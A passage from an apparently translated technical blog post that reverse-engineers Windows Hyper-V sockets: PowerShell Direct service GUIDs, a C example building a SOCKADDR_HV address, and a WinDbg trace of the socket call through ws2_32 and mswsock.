<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7FDFD0EA-CEA8-4576-92D6-E072DDD2C422</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Machine Provisioning Service</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ACEF5661-84A1-4E44-856B-6245E69F4620</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host Compute Service</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">999E53D4-3D5C-4C3E-8779-BED06EC056E1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 1</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A5201C21-2770-4C11-A68E-F182EDB29220</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 2</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">“VM Session Service 1” and “VM Session Service 2” are used by PowerShell Direct (the second GUID dates from before the Hyper-V socket duplication mechanism was released: if two connections are opened with New-PSSession within the same PowerShell session, the second connection uses the second GUID).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="95" src="https://lh3.googleusercontent.com/08vKFSa9V9auLPihTZPbYMrDKXHAjFG_kF5lC7jrLHw0YAHzwDZMNY32GHTZ370FdEw_kcz81nIvS1S0UdzyQ17M7mS0PDojJ_xO-jsKlNzme6ohZ8AT-OEOAD4n-tYThnr9P5UBL7EhAgq_7Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="444" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you try to open a third connection at the same time, an error is returned:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="151" src="https://lh4.googleusercontent.com/6u4L7F4oUH4KrtkKOuVTFMnX7SZX5F2DCxQ64O12Ob7uS_TzWhTkvlURhK1-bzjIlIdqF9EmEobmyY5lQN5MT3ksJr9tjyfL-Qezi5aO0Vt8SOCjEsHlM-UI7n0hUrhmDghESwELt7eXOLE72w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="524" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and only two sessions stay open. When messages are sent to the guest OS, both GUIDs can be seen:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="129" src="https://lh5.googleusercontent.com/mjdtfZPeJRKKqGNf1YSE5i93NLUT1Ljnkg-p076UWvtFg6BQuCV068j1xgdZmU9a5U6U8BH-XiLU_D3EcoGCLezGBkmhtpi4-1c9pZ-pseNLevtcXbBKr3eZ5eEeUqfnxU60gTDpry9M18Uagw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="418" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="129" src="https://lh5.googleusercontent.com/tMij8wdz7DghO7EGdPHEx478ujeWL49hlXng-PImUNUfg2rBvUrCOSJ9A1dirhvX0z0CYbzYI68OIF5YPa0cRZuLM5AO9AnkOgMWfkAZgaqlwyS3cxm0kjkkuwUNjGhyp1g0bGKyLTj2qeMlMQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="418" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But we need only one communication channel, so a single GUID is enough: </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">B1D00D3E-FE10-4570-AD62-7648779D7A1B</span></div>
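<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Both GUIDs end up in the socket address: a Hyper-V socket is bound or connected with a SOCKADDR_HV, which holds the address family, a reserved word, the VmId and the ServiceId. A Windows GUID is stored with its first three fields little-endian, so the text form cannot simply be copied into memory. The following C program is an example added to this edition, not code from the original post or from Microsoft's samples; it packs HV_GUID_PARENT and the service GUID B1D00D3E-FE10-4570-AD62-7648779D7A1B into that 36-byte layout without Windows headers, so it compiles on any platform and shows the exact bytes that bind/connect will receive. The names AF_HYPERV_VALUE, SOCKADDR_HV_SIZE, guid_to_bytes and build_sockaddr_hv are the example's own.</span></div>

```c
/* Added example (not from the original post): build the in-memory image of
 * a SOCKADDR_HV for an AF_HYPERV socket.  Layout follows hvsocket.h:
 *   ADDRESS_FAMILY Family;    // AF_HYPERV (34), little-endian USHORT
 *   USHORT         Reserved;  // must be zero
 *   GUID           VmId;      // partition, here HV_GUID_PARENT
 *   GUID           ServiceId; // registered under GuestCommunicationServices
 * Data1..Data3 of a GUID are little-endian in memory, Data4 is raw bytes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AF_HYPERV_VALUE  34   /* example's name for AF_HYPERV */
#define SOCKADDR_HV_SIZE 36   /* 2 + 2 + 16 + 16 */

/* GUIDs quoted in the article: HV_GUID_PARENT and the generated service GUID. */
static const char *HV_GUID_PARENT_TEXT = "a42e7cda-d03f-480c-9cc2-a4de20abb878";
static const char *SERVICE_GUID_TEXT   = "B1D00D3E-FE10-4570-AD62-7648779D7A1B";

/* Parse "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" into the 16-byte Windows GUID
 * memory layout.  Returns 0 on success, -1 on malformed input. */
int guid_to_bytes(const char *text, uint8_t out[16])
{
    unsigned d1, d2, d3, d4[8];
    if (text == NULL || strlen(text) != 36) return -1;
    if (sscanf(text, "%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x",
               &d1, &d2, &d3, &d4[0], &d4[1], &d4[2], &d4[3],
               &d4[4], &d4[5], &d4[6], &d4[7]) != 11)
        return -1;
    out[0] = d1 & 0xff; out[1] = (d1 >> 8) & 0xff;          /* Data1 LE */
    out[2] = (d1 >> 16) & 0xff; out[3] = (d1 >> 24) & 0xff;
    out[4] = d2 & 0xff; out[5] = (d2 >> 8) & 0xff;          /* Data2 LE */
    out[6] = d3 & 0xff; out[7] = (d3 >> 8) & 0xff;          /* Data3 LE */
    for (int i = 0; i < 8; i++) out[8 + i] = (uint8_t)d4[i]; /* Data4 raw */
    return 0;
}

/* Fill the 36-byte SOCKADDR_HV image.  Returns its length, or -1 on a bad GUID. */
int build_sockaddr_hv(const char *vm_id, const char *service_id,
                      uint8_t out[SOCKADDR_HV_SIZE])
{
    memset(out, 0, SOCKADDR_HV_SIZE);
    out[0] = AF_HYPERV_VALUE & 0xff;       /* Family */
    out[1] = AF_HYPERV_VALUE >> 8;
    /* out[2..3] is Reserved and stays zero */
    if (guid_to_bytes(vm_id, out + 4) != 0) return -1;       /* VmId      */
    if (guid_to_bytes(service_id, out + 20) != 0) return -1; /* ServiceId */
    return SOCKADDR_HV_SIZE;
}

int main(void)
{
    uint8_t addr[SOCKADDR_HV_SIZE];
    int len = build_sockaddr_hv(HV_GUID_PARENT_TEXT, SERVICE_GUID_TEXT, addr);
    if (len < 0) { fputs("malformed GUID\n", stderr); return 1; }
    printf("SOCKADDR_HV (%d bytes):", len);
    for (int i = 0; i < len; i++) printf("%s%02x", (i % 4) ? " " : "\n  ", addr[i]);
    putchar('\n');
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first two bytes come out as 22 00, the VmId as da 7c 2e a4 3f d0 0c 48 followed by the raw Data4 bytes, which is how the address looks in a memory dump of the connecting process; keeping the reserved word at zero matters because the provider rejects addresses that do not match this layout.</span></div>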
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> iResult = WSAStartup(</span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MAKEWORD</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(2,2), &wsaData);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We skip the WSAStartup call, since it takes no parameters specific to Hyper-V sockets, and go straight to the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;"><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Socket</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The values of all parameters can be seen in the ServerExample source code; we go directly to the socket call:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&hints, </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(hints));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ListenSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The call compiles to the following:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="64" src="https://lh4.googleusercontent.com/IZtors9-RO_5rm0dpN7F9XwmB2HmCDKKs5yyMYGygQN_JREEpc9KMS0567049lMznNbkyMXqq6rApAUqsFbAQvg95b6s6ILLs5CMfZcaE8JDTw5quNfjg5J169ZTmnwywwNPgqRV_zBRp3TA7A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="329" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ws2_32!WSASocketA calls ws2_32!WSASocketW, which in turn calls ws2_32!DPROVIDER::Initialize.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(esp+4) L100 – the 2nd parameter of DPROVIDER::Initialize (the WSAPROTOCOL_INFOW structure built from the value of the registry key Protocol_Catalog9\Catalog_Entries\000000000001)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b48c 00020026 00000000 00000000 00000000 &...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b49c 00000008 1234191b 4ca74bf7 d7dfe086 ......4..K.L....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4ac 45542bc3 000003e9 00000001 00000000 .+TE............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4bc 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4cc 00000000 00000000 00000002 00000022 ............"...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4dc 00000024 00000024 00000001 00000001 $...$...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4ec 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4fc 00000000 00790048 00650070 002d0072 ....H.y.p.e.r.-.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b50c 00200056 00410052 00000057 00000000 V. .R.A.W.......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b51c 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next we see the initialization of the pointers to the socket helper functions:</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="311"></col><col width="312"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="137" src="https://lh5.googleusercontent.com/qn8LvWK8joickqtWAl0xD8yRFmQskPCr_TYWTgb7u2acgVeX6gUmDEPm4MOuKhJX9pxoIMHGiLii5OFZeJR1o87r0DKbS-av2jsx2NOZ_T7g78FYRqEwJaiqM2yeK7Pwnof_aG5soop32rAQaA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="237" /></span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="69" src="https://lh3.googleusercontent.com/bJ93Nqj2n3Fw5NH071xGJlJLO2TLmCIsAvcMYD3cJ9cuW_upsrcb7IaEzpi4BhPPc070RoWex7MOYsybiGAenBXx-nBCKrqHQe76V8Vo2drTkG2y3E-fAO6OiGgqhWOyoxZt7WBp20zCqTe7-A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="129" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>du poi(esp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00d5f178 "C:\Windows\system32\mswsock.dll"</span></div>
</td></tr>
</tbody></table>
</div>
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Quite a lot of work is done in user mode; I will describe only the most important steps.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, mswsock.dll is loaded with LoadLibraryEx, GetProcAddress resolves the address of mswsock!WSPStartup, and execution is transferred to that function. Inside it, mswsock_initialize is executed, followed by ws32SQMinit and WahCreateContextTable.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After mswsock!WSPStartup completes, the procedure mswsock!WSPSocket is called (through call esi); it calls mswsock!socksocket and then mswsock!sockGetTdiName, whose first parameter is:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID poi(esp+4)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xf6f4a0)) : {</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1234191B-4BF7-4CA7-86E0-DFD7C32B5445</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG> dc poi(esp+4)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f4a0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7 d7dfe086 45542bc3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ..4..K.L.....+TE – the Hyper-V RAW provider GUID (also visible in the netsh output)</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then mswsock!SockLoadTransportList is called, which reads the value of the registry key "SYSTEM\CurrentControlSet\Services\Winsock\Parameters\Transports".</span></div>
